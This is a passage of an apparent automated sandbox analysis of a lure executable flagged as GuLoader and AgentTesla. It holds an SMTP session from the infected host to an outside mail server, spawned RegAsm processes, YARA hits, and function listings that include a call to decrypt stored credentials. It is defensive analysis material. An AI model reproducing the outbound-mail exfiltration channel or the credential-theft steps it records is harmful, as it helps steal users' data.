                                              2021-09-28 11:02:14 UTC222INData Raw: 06 e6 95 13 5d 86 97 c8 ac 31 f7 96 1c 0f 6f 2b 2f 5d 50 e6 58 b7 8c 54 6c f5 3c 21 02 44 77 2a f3 78 8d 58 9b 01 ca 81 0f d1 1b df c2 ba 6d b7 98 78 ca a0 5d 22 f1 89 ea 1e 3f e9 56 0c e8 a5 c0 e1 8a aa 5d 6a 66 d0 2f 76 ca a3 de d3 a7 39 2a 08 92 36 48 ca 7f 40 be ad dc 6a
                                              Data Ascii: ]1o+/]PXTl<!Dw*xXmx]"?V]jf/v9*6H@j


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Sep 28, 2021 13:03:50.215318918 CEST58749748109.169.39.245192.168.11.20220-s3.xperimenta.net ESMTP Exim 4.91 #1 Tue, 28 Sep 2021 13:03:50 +0200
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Sep 28, 2021 13:03:50.215816975 CEST49748587192.168.11.20109.169.39.245EHLO 376483
                                              Sep 28, 2021 13:03:50.235476017 CEST58749748109.169.39.245192.168.11.20250-s3.xperimenta.net Hello 376483 [84.17.52.54]
                                              250-SIZE 94371840
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Sep 28, 2021 13:03:50.235780001 CEST49748587192.168.11.20109.169.39.245STARTTLS
                                              Sep 28, 2021 13:03:50.272535086 CEST58749748109.169.39.245192.168.11.20220 TLS go ahead

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe PID: 8728 Parent PID: 8384

                                              General

                                              Start time:13:01:25
                                              Start date:28/09/2021
                                              Path:C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
                                              Imagebase:0x400000
                                              File size:90112 bytes
                                              MD5 hash:419A3E9CE6606D5ED7B22A7574E1A294
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Visual Basic
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1080090056.0000000002250000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 8100 Parent PID: 8728

                                              General

                                              Start time:13:01:48
                                              Start date:28/09/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
                                              Imagebase:0x160000
                                              File size:65440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 8676 Parent PID: 8728

                                              General

                                              Start time:13:01:48
                                              Start date:28/09/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
                                              Imagebase:0x250000
                                              File size:65440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 9020 Parent PID: 8728

                                              General

                                              Start time:13:01:48
                                              Start date:28/09/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
                                              Imagebase:0x1e0000
                                              File size:65440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 9012 Parent PID: 8728

                                              General

                                              Start time:13:01:48
                                              Start date:28/09/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe'
                                              Imagebase:0xa70000
                                              File size:65440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 3996 Parent PID: 9012

                                              General

                                              Start time:13:01:49
                                              Start date:28/09/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75ead0000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe PID: 8728 Parent PID: 8384 Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCOMMON

                                                Executed Functions

                                                Function 00412AD0, Relevance: 75.6, APIs: 39, Strings: 4, Instructions: 329COMMON
                                                Download Yara Rule
                                                APIs
                                                • #612.MSVBVM60(?), ref: 00412B52
                                                • __vbaStrVarMove.MSVBVM60(?), ref: 00412B5C
                                                • __vbaStrMove.MSVBVM60 ref: 00412B67
                                                • __vbaFreeVar.MSVBVM60 ref: 00412B70
                                                • #575.MSVBVM60(?,?), ref: 00412B8C
                                                • __vbaVarTstNe.MSVBVM60(?,?), ref: 00412BAE
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00412BC1
                                                • __vbaNew2.MSVBVM60(00410824,004145C0), ref: 00412BE1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,02AE004C,00410814,00000034,?,?,00000ACB,?), ref: 00412C2B
                                                • __vbaObjSet.MSVBVM60(?,?,?,?,00000ACB,?), ref: 00412C3C
                                                • __vbaStrToAnsi.MSVBVM60(?,snappishly,00000000), ref: 00412C4C
                                                • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00412C5F
                                                • __vbaFreeStr.MSVBVM60(?,?,00000ACB,?), ref: 00412C7E
                                                • __vbaFpI4.MSVBVM60(?,?,00000ACB,?), ref: 00412C91
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004010F0,004102D8,000002C8), ref: 00412CC7
                                                • __vbaSetSystemError.MSVBVM60(00000000,00000002,00000002), ref: 00412CDD
                                                • __vbaNew2.MSVBVM60(00410824,004145C0), ref: 00412D05
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,02AE004C,00410814,0000004C), ref: 00412D2A
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410850,0000001C,?,?,?,?), ref: 00412D7A
                                                • __vbaObjSet.MSVBVM60(?,?,?,?,?,?), ref: 00412D8B
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00412D94
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004010F0,00410308,000006F8), ref: 00412DBC
                                                • __vbaStrCopy.MSVBVM60 ref: 00412DCA
                                                • __vbaFreeStr.MSVBVM60 ref: 00412E03
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004010F0,004102D8,000002B4), ref: 00412E30
                                                • __vbaStrToAnsi.MSVBVM60(?,SINGFEST,00267EEC), ref: 00412E4D
                                                • __vbaSetSystemError.MSVBVM60(000C5DB5,00000000), ref: 00412E64
                                                • __vbaFreeStr.MSVBVM60 ref: 00412E83
                                                • __vbaNew2.MSVBVM60(00410824,004145C0), ref: 00412E9C
                                                • __vbaLateMemCallLd.MSVBVM60(00000002,?,WkKauIFp5j1bv26pBJsl8jmR69NV785,00000000), ref: 00412EB8
                                                • __vbaObjVar.MSVBVM60(00000000), ref: 00412EC2
                                                • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00412ECD
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,02AE004C,00410814,0000000C), ref: 00412EE7
                                                • __vbaFreeObj.MSVBVM60 ref: 00412EF0
                                                • __vbaFreeVar.MSVBVM60 ref: 00412EF9
                                                • __vbaFreeObj.MSVBVM60(00412F5A), ref: 00412F44
                                                • __vbaFreeStr.MSVBVM60 ref: 00412F49
                                                • __vbaFreeObj.MSVBVM60 ref: 00412F52
                                                • __vbaFreeObj.MSVBVM60 ref: 00412F57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1079112038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1079093909.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079208561.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresult$ErrorNew2System$AnsiMove$#575#612AddrefCallCopyLateList
                                                • String ID: Palmira$SINGFEST$WkKauIFp5j1bv26pBJsl8jmR69NV785$snappishly
                                                • API String ID: 1255662601-1278630523
                                                • Opcode ID: 57a7e6ddf68f3481645ba134acf423f00e4d159d21e6b44fe6e6a72cddb667f4
                                                • Instruction ID: d92881ed6eb9d3553e3f1eff9150c784f4882c86947db668497fd4175a260685
                                                • Opcode Fuzzy Hash: 57a7e6ddf68f3481645ba134acf423f00e4d159d21e6b44fe6e6a72cddb667f4
                                                • Instruction Fuzzy Hash: 35D16B70900209EFDB10DFA4DE89ADEBBB9FF48701F10816AF545A72A0D7745985CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004012C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1079112038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1079093909.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079208561.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: #100
                                                • String ID: VB5!6!*
                                                • API String ID: 1341478452-2574520878
                                                • Opcode ID: 059709186062d4cdfa91e99c4068550d70c9cbed65314edf9b53f941315a213c
                                                • Instruction ID: 427aba37f4e1bc6edd35d26432bfb5f9df48d119fb136e4deb46106c9c8291c6
                                                • Opcode Fuzzy Hash: 059709186062d4cdfa91e99c4068550d70c9cbed65314edf9b53f941315a213c
                                                • Instruction Fuzzy Hash: 4A01CC6405E3D56EE30B12399C619A23F74CD1369831A01EFD5C2DE0F3D119484A83B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 02254DC9, Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1080090056.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2904a5bf5651f38e143f152034f5ed8d5de5be00f3bdd7936ab5205e7ee6bb26
                                                • Instruction ID: d2aba26b85378c3c17435bc6ffec57d41f4312f6e37725cc654bef023426c85e
                                                • Opcode Fuzzy Hash: 2904a5bf5651f38e143f152034f5ed8d5de5be00f3bdd7936ab5205e7ee6bb26
                                                • Instruction Fuzzy Hash: 5811E9B2F6040E9ECF609F50D9B14EDB7A0DA55EA9BB58854EC3695221EB35C901C7C0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413290, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • #672.MSVBVM60(00000000,40080000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000), ref: 004132DC
                                                • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 004132E2
                                                • __vbaNew2.MSVBVM60(00410824,004145C0,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 00413307
                                                • __vbaLateMemCallLd.MSVBVM60(?,?,qTu9tyktlIOgozvLrZMBbdZxTILvo43,00000000), ref: 00413323
                                                • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 0041332D
                                                • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 00413338
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,02AE004C,00410814,0000000C), ref: 00413352
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 0041335B
                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 00413364
                                                • __vbaFreeObj.MSVBVM60(00413396), ref: 0041338F
                                                Strings
                                                • qTu9tyktlIOgozvLrZMBbdZxTILvo43, xrefs: 00413317
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1079112038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1079093909.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079208561.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$#672AddrefCallCheckHresultLateNew2
                                                • String ID: qTu9tyktlIOgozvLrZMBbdZxTILvo43
                                                • API String ID: 263512575-2009357870
                                                • Opcode ID: 71b71276ff3097dd3d118dc4e46e40cff4b5bfe760e0241770953e2dd8303891
                                                • Instruction ID: 32d9fe3a18cc923cee3dbaf4f892a1f7826029f211639e758e40349ed304a372
                                                • Opcode Fuzzy Hash: 71b71276ff3097dd3d118dc4e46e40cff4b5bfe760e0241770953e2dd8303891
                                                • Instruction Fuzzy Hash: EE2141B0900249EBDB109F95DE4DFAABBB8FB54701F104016F541B2560D7781581CF6C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00412F80, Relevance: 12.1, APIs: 8, Instructions: 99COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaAryConstruct2.MSVBVM60(?,004108D0,00000005), ref: 00412FBC
                                                • #682.MSVBVM60(?,?), ref: 00412FFD
                                                • __vbaFpR8.MSVBVM60 ref: 00413003
                                                • __vbaFreeVar.MSVBVM60 ref: 00413027
                                                • _adj_fdiv_m64.MSVBVM60 ref: 00413059
                                                • __vbaFpI4.MSVBVM60(42FC0000,?,436E0000), ref: 00413087
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004102D8,000002C0,?,436E0000), ref: 004130BB
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,004130E6), ref: 004130DF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1079112038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1079093909.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079208561.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$#682CheckConstruct2DestructFreeHresult_adj_fdiv_m64
                                                • String ID:
                                                • API String ID: 4111779564-0
                                                • Opcode ID: 6dc88085493ff0b300ef62be2022bd5eecc8d4ce854d6e52a3ec44fb1fc64361
                                                • Instruction ID: 8f8f74fde1a01cbe1bb12d28b01b5064cba74e7af9c990e0183b89a63108f47a
                                                • Opcode Fuzzy Hash: 6dc88085493ff0b300ef62be2022bd5eecc8d4ce854d6e52a3ec44fb1fc64361
                                                • Instruction Fuzzy Hash: D0315E74901248EBCB049F91DE49BEEBBB8FB48701F00812AF541BB2A4C7B85985CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413100, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaVarTstNe.MSVBVM60(?,?), ref: 00413164
                                                • __vbaInStr.MSVBVM60(00000000,Bebyrdelses9,Hvislendes8,FF96B5C0), ref: 0041317F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1079112038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1079093909.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079208561.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba
                                                • String ID: Bebyrdelses9$Hvislendes8
                                                • API String ID: 3524132090-1996639642
                                                • Opcode ID: 68093a532412e65ef241b1491ff73f36d8f5636b0fcf591279e217219112fe44
                                                • Instruction ID: 35ff8a3f9e9de3b900832c2110d4a310f58da126c94b94fdcd018c4d2a64b38d
                                                • Opcode Fuzzy Hash: 68093a532412e65ef241b1491ff73f36d8f5636b0fcf591279e217219112fe44
                                                • Instruction Fuzzy Hash: 12010CB0910218BBCB10DF98C989BDDBFB8BF08B44F14815AF504B6251D7B91585CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004131C0, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaNew2.MSVBVM60(00410824,004145C0), ref: 00413203
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,02AE004C,00410814,0000004C), ref: 00413228
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410850,00000028), ref: 00413248
                                                • __vbaFreeObj.MSVBVM60 ref: 00413251
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1079112038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1079093909.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079208561.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000005.00000002.1079227270.0000000000415000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$CheckHresult$FreeNew2
                                                • String ID:
                                                • API String ID: 4261391273-0
                                                • Opcode ID: 7b143a1cf2ffaeb7d32b2d42edd302fd4936fc20c17dd59404b4c77dec335ac2
                                                • Instruction ID: 31fbc812d28f71308fd95695de7c808f0f112ad60c5a0b29e90e68621daca0d6
                                                • Opcode Fuzzy Hash: 7b143a1cf2ffaeb7d32b2d42edd302fd4936fc20c17dd59404b4c77dec335ac2
                                                • Instruction Fuzzy Hash: 0C115174640205BBD700AF69CE49FDA7BF8FB18B01F104165B605F32A0E7B859858AE8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: RegAsm.exe PID: 9012 Parent PID: 8728 RegAsm.exeCOMMON

                                                Executed Functions

                                                Function 00E4BA58, Relevance: 4.6, Strings: 3, Instructions: 899COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: ,k$,k$Hk
                                                • API String ID: 0-1469311610
                                                • Opcode ID: eb120f98da3b98e15fff6b6ed1e9ac3489e4a78e6c7dd1e09442de47602f4aac
                                                • Instruction ID: 7f0b9d3311c01acd3711e079a946220554c74ecb612f10256c3fe05a99af45fd
                                                • Opcode Fuzzy Hash: eb120f98da3b98e15fff6b6ed1e9ac3489e4a78e6c7dd1e09442de47602f4aac
                                                • Instruction Fuzzy Hash: 04729070A051198FCB54CF69D984AAEBBF2FF89304F258069E915EB3A1DB34EC41CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E56AC8, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5628223474.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: <0!
                                                • API String ID: 0-136530110
                                                • Opcode ID: 2a8890701e5cf82d4b24d2df23863dc39238d4940e659a24b576cd3c7f113bf6
                                                • Instruction ID: b2accb893f38615bda4246e021991a1f881416fbca2895eab62bcd88bf1f8310
                                                • Opcode Fuzzy Hash: 2a8890701e5cf82d4b24d2df23863dc39238d4940e659a24b576cd3c7f113bf6
                                                • Instruction Fuzzy Hash: 73F16E34A00219CFDB14CFA5C884BADBBF2FF88309F559959E805AF295DB70AD49CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115BF78, Relevance: 3.5, Instructions: 3512COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d61ee234739affdac0568b45f31b1ca49e8fa52b8677d2917a1adfc9b5fdcd2
                                                • Instruction ID: b25e70652cda79c8896e4519159f7a8767cc6837b0c49a18f2bd5ad75456967d
                                                • Opcode Fuzzy Hash: 6d61ee234739affdac0568b45f31b1ca49e8fa52b8677d2917a1adfc9b5fdcd2
                                                • Instruction Fuzzy Hash: CB735E31D1171ACECB55EF68C844A99F7B1FF95300F15C69AE458AB221EB30AAC5CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E4C7B8, Relevance: 3.4, Strings: 2, Instructions: 887COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: ,k$,k
                                                • API String ID: 0-2928433764
                                                • Opcode ID: 2a24dafc99e85b6d84b33c7aabe600e2a6f734cdf1f7575be22425d69907bf6e
                                                • Instruction ID: d2df3e12a7007636bebd18d146484ec5672bb2f9d6a7b2e636391bb8b9637a55
                                                • Opcode Fuzzy Hash: 2a24dafc99e85b6d84b33c7aabe600e2a6f734cdf1f7575be22425d69907bf6e
                                                • Instruction Fuzzy Hash: ED824B30A05209DFCB54CF68E984AAEBBF2FF88314F259569E805EB261D770ED41CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115AE68, Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 0o/j$Dq/j
                                                • API String ID: 0-2601973696
                                                • Opcode ID: 9d15c5e2654df5abde9cbea23a3eea01eb97fdbfecb85066c9910742d35fe759
                                                • Instruction ID: 790b84a377ded0b14cc330aaad1c4d77674a08da7101607df545ab23fd7ad2fc
                                                • Opcode Fuzzy Hash: 9d15c5e2654df5abde9cbea23a3eea01eb97fdbfecb85066c9910742d35fe759
                                                • Instruction Fuzzy Hash: BCD1D031B082048FDB489BB4C8587AE7BE3AFC5344F168469E515DB3A5DF78AC068762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46958, Relevance: 2.5, APIs: 1, Instructions: 962libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 295c5f9475b21daaedaf1379861a8f13b8c2c876c714a365bc395495516b86b3
                                                • Instruction ID: 79b0e4a8dc1f1a53bfdc1d39b7c2b0b031f38358c0b48372a01645175bf6ff67
                                                • Opcode Fuzzy Hash: 295c5f9475b21daaedaf1379861a8f13b8c2c876c714a365bc395495516b86b3
                                                • Instruction Fuzzy Hash: 94A214B4A04228CFCB65EF70C89879DB7B2BB88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D393588, Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Xk
                                                • API String ID: 0-3738635399
                                                • Opcode ID: d7817b9492418c53c94a666a594b84c969566dfed4f6ada54e46c231ca86ff12
                                                • Instruction ID: d0162b03166515a7d051499d5f80d08282a85150817b0c91430f288f8506542a
                                                • Opcode Fuzzy Hash: d7817b9492418c53c94a666a594b84c969566dfed4f6ada54e46c231ca86ff12
                                                • Instruction Fuzzy Hash: 684204B0F042049BEB189B78C8957BEB6E3AB85310F158539E21AEF3D1DE75DC418792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C3C68, Relevance: 1.8, Instructions: 1824COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16f93016c59addd7979855b270d27360ed237df9cf71810b57071fd260d128ff
                                                • Instruction ID: ee4f0a5d27bddaee77653dd221fcf67adc1f5c5a47f494c18491633bce83b3c9
                                                • Opcode Fuzzy Hash: 16f93016c59addd7979855b270d27360ed237df9cf71810b57071fd260d128ff
                                                • Instruction Fuzzy Hash: C3133D70D1075A8FCB54EF68C8846ADF7B1BF99304F15C69AD458AB221EB30AAC4CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011CA1D0, Relevance: 1.8, Strings: 1, Instructions: 507COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Hk
                                                • API String ID: 0-2725002668
                                                • Opcode ID: 016004098d9d74516f7dcf0ab4255103a91a3103b222e94bb9b48b07b78752e0
                                                • Instruction ID: 87c0d8c8f476a4b974133489b823746f6651ca596afb83e3f50ae5c526a6aa61
                                                • Opcode Fuzzy Hash: 016004098d9d74516f7dcf0ab4255103a91a3103b222e94bb9b48b07b78752e0
                                                • Instruction Fuzzy Hash: 8412C034B042188FCB09DBB8C8947AEBBF2AF84714F158569D505DB395EB35EC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C7211, Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 011C727D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: 9c3100ede726a6c94882862fdd26058eeaa0c11d9d78ebf70a9d8d537cced0ea
                                                • Instruction ID: 7208c8e08eeddeb0a983068cad8a0a2b61e73a4c74aade758cf1a639a545b1cc
                                                • Opcode Fuzzy Hash: 9c3100ede726a6c94882862fdd26058eeaa0c11d9d78ebf70a9d8d537cced0ea
                                                • Instruction Fuzzy Hash: 80214776800249DFCB10CF99C944BDEBBF5EF48720F148419EA14A7651C379A955CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D395550, Relevance: 1.6, Instructions: 1555COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8863aac2e401fc8a9875d35c3af9d6bdb1722068ff3da1c821db8ee9e084e6cd
                                                • Instruction ID: 0fad3edb11fce90c27c5fb72fa92389f44211ed7a65ad9bb6d6125ac45309758
